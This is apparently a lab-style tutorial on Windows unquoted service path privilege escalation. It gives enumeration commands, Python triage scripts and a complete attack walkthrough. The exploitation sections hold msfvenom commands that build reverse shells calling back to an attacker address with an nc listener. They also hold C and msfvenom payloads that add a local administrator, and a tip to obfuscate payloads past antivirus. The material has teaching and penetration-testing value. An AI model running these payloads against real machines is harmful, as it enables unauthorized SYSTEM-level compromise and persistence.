Unquoted Service Paths

intermediate · 30 min · Writeup

Exploiting unquoted service path vulnerabilities

Learning Objectives

  • Identify unquoted paths
  • Find writable directories
  • Create malicious executables
  • Restart services

Unquoted service paths are a classic Windows privilege escalation vector. When a service's binary path contains spaces and isn't enclosed in quotes, Windows searches for the executable in a predictable order. Place a binary with the right name in a directory you can write to that comes earlier in that order, and it runs under the service's account (often LocalSystem) the next time the service starts.

Think of it like a GPS giving ambiguous directions: "Go to Main Street Coffee Shop". Should you go to Main Street, or Main Street Coffee Shop? Windows has the same confusion - and we can exploit it.

Why It Works

When the Service Control Manager starts a service, it hands BINARY_PATH_NAME to CreateProcess as the command line without a separate application name. CreateProcess then treats the first whitespace-delimited token as the executable (appending .exe if it has no extension); if that file does not exist it extends the name to the next whitespace and tries again, until something runs or the candidates are exhausted. Quoting the path removes the ambiguity.

Understanding the Vulnerability

Example vulnerable service path:
C:\Program Files\Vendor Name\App Folder\service.exe

Windows parsing (unquoted):
1. Try: C:\Program.exe
2. Try: C:\Program Files\Vendor.exe
3. Try: C:\Program Files\Vendor Name\App.exe
4. Try: C:\Program Files\Vendor Name\App Folder\service.exe

If we can create a file at ANY of the locations tried before the real binary:
├── C:\Program.exe (needs write access to C:\ - rarely writable)
├── C:\Program Files\Vendor.exe (needs write access to C:\Program Files - rarely writable)
└── C:\Program Files\Vendor Name\App.exe (needs write access to the vendor folder - sometimes writable!)

Safe (quoted) service path:
"C:\Program Files\Vendor Name\App Folder\service.exe"
→ Windows takes the whole path as-is, no ambiguity

Why Third-Party Apps Are Vulnerable

Common vulnerability patterns:
├── Third-party installers often don't quote paths
├── Custom enterprise software is frequently vulnerable
├── Older software rarely quotes paths properly
└── Default Windows services are usually quoted (safe)

Where to focus:
├── C:\Program Files\[Vendor Name] ← Spaces in vendor name
├── C:\Program Files (x86)\[Vendor] ← 32-bit apps
└── C:\[Custom Install Path] ← Custom installations

Finding Unquoted Paths

batch
REM Find unquoted paths with spaces (CMD)
REM wmic is deprecated and may be absent on recent Windows 11 builds; use the PowerShell query below there
wmic service get name,displayname,pathname,startmode | findstr /i "auto" | findstr /i /v "c:\windows\\" | findstr /i /v """

REM Breakdown:
REM findstr /i "auto"            = Only AUTO_START services
REM findstr /i /v "c:\windows\\" = Exclude the Windows directory
REM findstr /i /v """            = Exclude paths that contain a quote character

REM Manual check of a specific service (shows BINARY_PATH_NAME and SERVICE_START_NAME)
sc qc "Vulnerable Service"

REM PowerShell method (Get-CimInstance works in both Windows PowerShell and PowerShell 7)
Get-CimInstance Win32_Service | Select-Object Name, PathName, StartMode, StartName | Where-Object {$_.PathName -notlike '"*' -and $_.PathName -like "* *" -and $_.PathName -notlike "C:\Windows\*"}
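The search order and the findstr filter chain are easy to get wrong by hand, so here is an added example (not code from the original page) that does the triage offline in Python over output saved from `wmic service get name,pathname,startmode`: it keeps auto-start, unquoted, space-containing paths outside C:\Windows and lists the executables CreateProcess would try before the real binary. The wmic output and the service names and paths in it are constructed for illustration; the rule that an unquoted binary path ends at the first token ending in `.exe` is a heuristic assumption for separating the path from service arguments.

```python
# Added example: offline triage of saved `wmic service get name,pathname,startmode`
# output. Not part of the original page; the sample output is constructed and the
# service names/paths in it are hypothetical.
import re
from typing import Dict, List

# Constructed sample of `wmic service get name,pathname,startmode` (hypothetical services).
WMIC_OUTPUT = r"""Name           PathName                                                          StartMode
Dhcp           C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted    Auto
MyBackup       C:\Program Files\My Backup Service\Backup Engine\backupsvc.exe      Auto
VendorUpdater  "C:\Program Files\Vendor Name\updater.exe" /svc                      Auto
LegacyAgent    C:\Program Files (x86)\Legacy Agent\agent.exe -config agent.cfg     Manual
"""

# StartMode is the last column, so anchor on it; PathName may itself contain spaces.
ROW_RE = re.compile(r"^(\S+)\s+(.*?)\s+(Auto|Manual|Disabled|Boot|System)\s*$")


def parse_wmic(output: str) -> List[Dict[str, str]]:
    """Turn the fixed-width wmic table into dicts; the header line does not match ROW_RE."""
    rows = []
    for line in output.splitlines():
        m = ROW_RE.match(line.rstrip())
        if m:
            rows.append({"name": m.group(1), "cmdline": m.group(2).strip(), "start": m.group(3)})
    return rows


def binary_path(cmdline: str) -> str:
    """Strip service arguments. Quoted: the text between the quotes. Unquoted: assume the
    path ends at the first token ending in .exe (heuristic assumption, as PowerUp does)."""
    cmdline = cmdline.strip()
    if cmdline.startswith('"'):
        end = cmdline.find('"', 1)
        return cmdline[1:] if end == -1 else cmdline[1:end]
    tokens = cmdline.split(" ")
    for i, tok in enumerate(tokens):
        if tok.lower().endswith(".exe"):
            return " ".join(tokens[: i + 1])
    return cmdline


def createprocess_candidates(path: str) -> List[str]:
    """Executables CreateProcess tries, in order, for an unquoted path containing spaces:
    every whitespace-delimited prefix, with .exe appended when the prefix's last path
    component has no extension. The final entry is the real binary."""
    tokens = path.split(" ")
    candidates = []
    for i in range(1, len(tokens) + 1):
        prefix = " ".join(tokens[:i])
        last_component = prefix.rsplit("\\", 1)[-1]
        candidates.append(prefix if "." in last_component else prefix + ".exe")
    return candidates


def hijack_points(path: str) -> List[str]:
    """Candidates tried BEFORE the real binary; each is a file you would need to be able
    to create in its parent directory."""
    return createprocess_candidates(path)[:-1]


def triage(output: str, auto_only: bool = True) -> Dict[str, List[str]]:
    """Map each interesting service to its hijack candidates, mirroring the findstr
    chain on the page: auto-start, outside the Windows directory, no quotes, spaces."""
    findings = {}
    for row in parse_wmic(output):
        cmdline = row["cmdline"]
        if auto_only and row["start"] != "Auto":
            continue
        if cmdline.lower().startswith("c:\\windows\\"):
            continue
        if cmdline.startswith('"'):
            continue  # quoted: CreateProcess takes the path as-is
        path = binary_path(cmdline)
        if " " not in path:
            continue  # unquoted but no spaces: nothing to hijack
        findings[row["name"]] = hijack_points(path)
    return findings


if __name__ == "__main__":
    for name, points in triage(WMIC_OUTPUT).items():
        print(f"{name}:")
        for point in points:
            print("    " + point)
```

Run it as-is to see the constructed MyBackup service flagged with four candidate names; pass `auto_only=False` to include Manual services, which only matter if you can start them yourself.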

PowerUp Automation

powershell
# Using PowerUp
Import-Module .\PowerUp.ps1

# Find unquoted service paths
Get-UnquotedService

# Output example:
# ServiceName    : VulnerableService
# Path           : C:\Program Files\Vendor Name\App\service.exe
# ModifiablePath : C:\Program Files\Vendor Name
# StartName      : LocalSystem
# AbuseFunction  : Write-ServiceBinary -Name 'VulnerableService' -Path ...

# This tells you exactly where to place your malicious binary

Checking Directory Writability

batch
REM Found unquoted path: C:\Program Files\Vendor Name\App Folder\service.exe
REM Candidates before the real binary: C:\Program.exe, C:\Program Files\Vendor.exe,
REM C:\Program Files\Vendor Name\App.exe - so check C:\, C:\Program Files and C:\Program Files\Vendor Name

icacls "C:\Program Files\Vendor Name"
REM Look for: BUILTIN\Users:(W) or (M) or (F)
REM           NT AUTHORITY\Authenticated Users:(W)
REM           Everyone:(W)
REM An ACE marked (IO) is inherit-only and does not apply to the directory itself.
REM Among specific rights, (WD) lets you create a file; (AD) alone only lets you add a subdirectory.

icacls "C:\Program Files"
icacls "C:\"

REM Using accesschk (Sysinternals): dump the ACL, then list directories writable by the current user
accesschk.exe -dqv "C:\Program Files\Vendor Name"
accesschk.exe -wud "C:\Program Files"

REM The hijack location must come BEFORE the actual service.exe in search order

REM Example:
REM Path:         C:\Program Files\My App\Sub Dir\service.exe
REM Can write to: C:\Program Files\My App
REM Hijack file:  C:\Program Files\My App\Sub.exe

Check All Locations

Check every directory in the search order, not just the first one. Often the vendor's own folder is writable even when the Program Files root isn't. A writable directory only helps if one of the candidate filenames falls inside it, so pair each directory with the name Windows would look for there.
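As an added example (not the page's own code), the following Python applies the writability rules above to saved `icacls` output for each directory in the search order. The ACL listings are constructed: the ones for `C:\` and `C:\Program Files` are modelled on Windows defaults, the vendor folder is hypothetical, and the candidate list is the search order for the hypothetical `C:\Program Files\My Backup Service\Backup Engine\backupsvc.exe`. An ACE only counts if it applies to the directory itself (not inherit-only) and grants a right that allows creating a file; in particular the default `(AD)` that Authenticated Users hold on `C:\` lets you add a subdirectory, not drop `C:\Program.exe`.

```python
# Added example: decide which CreateProcess candidates a low-privileged user could
# actually create, from saved `icacls` output. Not part of the original page; the ACL
# listings are constructed (C:\ and C:\Program Files resemble Windows defaults, the
# vendor folder is hypothetical) and the candidate list is for the hypothetical
# "My Backup Service" path.
import re
from typing import Dict, List

# Search-order candidates for C:\Program Files\My Backup Service\Backup Engine\backupsvc.exe
CANDIDATES = [
    "C:\\Program.exe",
    "C:\\Program Files\\My.exe",
    "C:\\Program Files\\My Backup.exe",
    "C:\\Program Files\\My Backup Service\\Backup.exe",
]

# Constructed `icacls <dir>` output, keyed by directory.
ICACLS_OUTPUT = {
    "C:\\": r"""C:\ BUILTIN\Administrators:(F)
    BUILTIN\Administrators:(OI)(CI)(IO)(F)
    NT AUTHORITY\SYSTEM:(F)
    NT AUTHORITY\SYSTEM:(OI)(CI)(IO)(F)
    BUILTIN\Users:(OI)(CI)(RX)
    NT AUTHORITY\Authenticated Users:(OI)(CI)(IO)(M)
    NT AUTHORITY\Authenticated Users:(AD)
    Mandatory Label\High Mandatory Level:(OI)(NP)(IO)(NW)

Successfully processed 1 files; Failed processing 0 files
""",
    "C:\\Program Files": r"""C:\Program Files NT SERVICE\TrustedInstaller:(F)
                 NT SERVICE\TrustedInstaller:(CI)(IO)(F)
                 NT AUTHORITY\SYSTEM:(M)
                 NT AUTHORITY\SYSTEM:(OI)(CI)(IO)(F)
                 BUILTIN\Administrators:(M)
                 BUILTIN\Administrators:(OI)(CI)(IO)(F)
                 BUILTIN\Users:(RX)
                 BUILTIN\Users:(OI)(CI)(IO)(GR,GE)
                 CREATOR OWNER:(OI)(CI)(IO)(F)

Successfully processed 1 files; Failed processing 0 files
""",
    "C:\\Program Files\\My Backup Service": r"""C:\Program Files\My Backup Service BUILTIN\Users:(OI)(CI)(M)
                                   NT AUTHORITY\SYSTEM:(OI)(CI)(F)
                                   BUILTIN\Administrators:(OI)(CI)(F)

Successfully processed 1 files; Failed processing 0 files
""",
}

# Principals an unprivileged user normally belongs to (lower-cased for comparison).
LOW_PRIV = {"everyone", "builtin\\users", "nt authority\\authenticated users", "nt authority\\interactive"}
# Rights that allow creating a file in a directory. AD (append data / add subdirectory)
# is deliberately absent: it lets you add a folder, not drop Program.exe.
CREATE_FILE_RIGHTS = {"F", "M", "W", "GA", "GW", "WD"}

ACE_RE = re.compile(r"^(.+?):((?:\([^)]*\))+)$")


def parse_icacls(text: str, directory: str) -> List[dict]:
    """Parse icacls ACE lines. The first line is prefixed with the path; the rights are
    always the last parenthesised group, earlier groups are inheritance/deny flags."""
    aces = []
    for line in text.splitlines():
        line = line.strip()
        if line.startswith(directory + " "):
            line = line[len(directory) + 1:]
        m = ACE_RE.match(line)
        if not m:
            continue  # summary line, blank line
        groups = re.findall(r"\(([^)]*)\)", m.group(2))
        aces.append({
            "principal": m.group(1).strip(),
            "deny": "DENY" in groups,
            "inherit_only": "IO" in groups,  # applies to children only, not this directory
            "rights": set(groups[-1].split(",")),
        })
    return aces


def file_create_principals(aces: List[dict], principals=LOW_PRIV) -> List[str]:
    """Low-privileged principals that may create a file directly in this directory."""
    allowed, denied = set(), set()
    for ace in aces:
        if ace["inherit_only"] or not (ace["rights"] & CREATE_FILE_RIGHTS):
            continue
        if ace["principal"].lower() not in principals:
            continue
        (denied if ace["deny"] else allowed).add(ace["principal"])
    return sorted(allowed - denied)


def parent_dir(exe: str) -> str:
    head = exe.rsplit("\\", 1)[0]
    return head + "\\" if head.endswith(":") else head  # "C:" -> "C:\"


def exploitable_hijacks(candidates: List[str], icacls_by_dir: Dict[str, str]) -> Dict[str, List[str]]:
    """Candidates whose parent directory a low-privileged user can create files in."""
    result = {}
    for exe in candidates:
        directory = parent_dir(exe)
        text = icacls_by_dir.get(directory)
        if text is None:
            continue  # no ACL captured for this directory; check it on the box
        who = file_create_principals(parse_icacls(text, directory))
        if who:
            result[exe] = who
    return result


if __name__ == "__main__":
    for exe, who in exploitable_hijacks(CANDIDATES, ICACLS_OUTPUT).items():
        print(f"{exe}  <- writable by {', '.join(who)}")
```

Only the candidate inside the vendor folder survives: `C:\` and `C:\Program Files` grant Users nothing that applies to the directory itself beyond read and execute, which is exactly why the page tells you to check every directory rather than stopping at the root.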

Exploitation

batch
REM Scenario: service path is C:\Program Files\Vulnerable App\Sub Dir\service.exe
REM CreateProcess tries C:\Program.exe, then C:\Program Files\Vulnerable.exe,
REM then C:\Program Files\Vulnerable App\Sub.exe, then the real binary
REM We can write to: C:\Program Files\Vulnerable App  -> the hijack file is Sub.exe

REM Step 1: Create malicious executable (on the attack machine)
msfvenom -p windows/x64/shell_reverse_tcp LHOST=10.10.14.5 LPORT=4444 -f exe-service -o Sub.exe
REM -f exe-service wraps the payload in a real service binary. A plain -f exe never answers
REM the SCM, so the start fails after the 30-second timeout (error 1053) and the process is
REM killed, taking a single-process reverse shell with it.

REM Transfer Sub.exe to the target

REM Step 2: Place it at the candidate that lives in the writable directory
copy Sub.exe "C:\Program Files\Vulnerable App\Sub.exe"
REM If C:\Program Files itself were writable (rare), the earlier candidate would do:
REM copy Sub.exe "C:\Program Files\Vulnerable.exe"

REM Step 3: Start listener (on the attack machine)
nc -lvnp 4444

REM Step 4: Restart service (if we have permission)
sc stop "Vulnerable App"
sc start "Vulnerable App"

REM Or wait for a service restart/system reboot

Alternative Payloads

batch
REM Simple user-adding payload (no reverse shell needed)
REM On the attack machine, create add_admin.c:
#include <stdlib.h>
int main(void) {
    system("net user hacker Password123! /add");
    system("net localgroup Administrators hacker /add");
    return 0;
}
REM Compile: x86_64-w64-mingw32-gcc add_admin.c -o evil.exe

REM Using msfvenom to add a user (quote the password: ! triggers history expansion in bash)
msfvenom -p windows/adduser USER=hacker PASS='Password123!' -f exe -o evil.exe

REM Using PowerUp's Write-ServiceBinary (writes an add-admin service binary to -Path)
Import-Module .\PowerUp.ps1
Write-ServiceBinary -Name 'VulnerableService' -Path 'C:\Program Files\Vulnerable.exe' -UserName 'hacker' -Password 'Password123!'
REM The net commands finish in well under the SCM start timeout, so the new local admin
REM exists even if the service start is reported as failed

Anti-Virus Detection

msfvenom payloads are often detected by AV. Consider obfuscation, custom compilation, or using the add-user approach which is less flagged than reverse shells.

Triggering the Exploit

batch
REM Method 1: Restart the service (needs SERVICE_STOP and SERVICE_START on the service object)
sc stop "Vulnerable Service"
sc start "Vulnerable Service"

REM Check whether we can: accesschk lists the service's DACL per principal
accesschk.exe -ucqv "Vulnerable Service"
REM Need: SERVICE_START and SERVICE_STOP (or SERVICE_ALL_ACCESS) for a group you belong to

REM Method 2: Reboot the computer (needs SeShutdownPrivilege; interactive users usually have it, check with whoami /priv)
shutdown /r /t 0

REM Method 3: Wait for the service to restart on its own
REM Some services have a restart-on-failure policy or are restarted by a scheduled task
sc qfailure "ServiceName"
REM AUTO_START services also run on the next reboot, so patience works too

REM Method 4: Crash the service so the restart-on-failure policy (shown by sc qfailure) relaunches it

Complete Attack Walkthrough

batch
REM === Complete Unquoted Service Path Attack ===

REM 1. Find vulnerable service
wmic service get name,pathname,startmode | findstr /i "auto" | findstr /i /v """
REM Found: MyBackup  C:\Program Files\My Backup Service\Backup Engine\backupsvc.exe  Auto

REM 2. Verify it's unquoted and runs as SYSTEM
sc qc MyBackup
REM BINARY_PATH_NAME   : C:\Program Files\My Backup Service\Backup Engine\backupsvc.exe
REM SERVICE_START_NAME : LocalSystem ← Runs as SYSTEM!

REM 3. Check where we can write (every directory in the search order)
icacls "C:\Program Files"
REM BUILTIN\Users:(RX) only - not writable
icacls "C:\Program Files\My Backup Service"
REM C:\Program Files\My Backup Service BUILTIN\Users:(OI)(CI)(M)
REM We can write here!

REM 4. Determine hijack filename. Windows will try, in order:
REM C:\Program.exe
REM C:\Program Files\My.exe
REM C:\Program Files\My Backup.exe                  (in C:\Program Files - not writable)
REM C:\Program Files\My Backup Service\Backup.exe   ← This is in the writable folder!
REM C:\Program Files\My Backup Service\Backup Engine\backupsvc.exe   (the real binary)

REM 5. Create payload (on the attack machine; exe-service so the SCM doesn't kill the shell)
msfvenom -p windows/x64/shell_reverse_tcp LHOST=10.10.14.5 LPORT=4444 -f exe-service -o Backup.exe

REM 6. Transfer and place payload
copy Backup.exe "C:\Program Files\My Backup Service\Backup.exe"

REM 7. Start listener on attack machine
nc -lvnp 4444

REM 8. Restart service
sc stop MyBackup
sc start MyBackup

REM 9. Catch SYSTEM shell on listener!

Exploitation Methodology

Unquoted Path Exploitation

1. Find: wmic (or PowerShell) query for unquoted paths with spaces
2. Verify: confirm the service runs as SYSTEM
3. Check dirs: icacls on each directory in the path
4. Determine name: work out what .exe filename Windows will try in the writable directory
5. Payload: create the malicious executable
6. Place: copy it to the writable location
7. Trigger: restart the service or wait for a reboot

Knowledge Check

Quick Quiz

For path 'C:\Program Files\My App\Sub Dir\svc.exe', which executable is tried first?

Challenges

Exploit Unquoted Path

Challenge
🔥 intermediate

Find a service with an unquoted path containing spaces, create a malicious binary, and achieve code execution as SYSTEM.

Key Takeaways

  • Unquoted paths with spaces = Windows searches multiple locations
  • Focus on third-party software, not Windows services
  • Check ALL directories in the path for write access
  • Filename must match what Windows would search for
  • Service must run as LocalSystem for SYSTEM privileges
  • Need to restart service or wait for reboot to trigger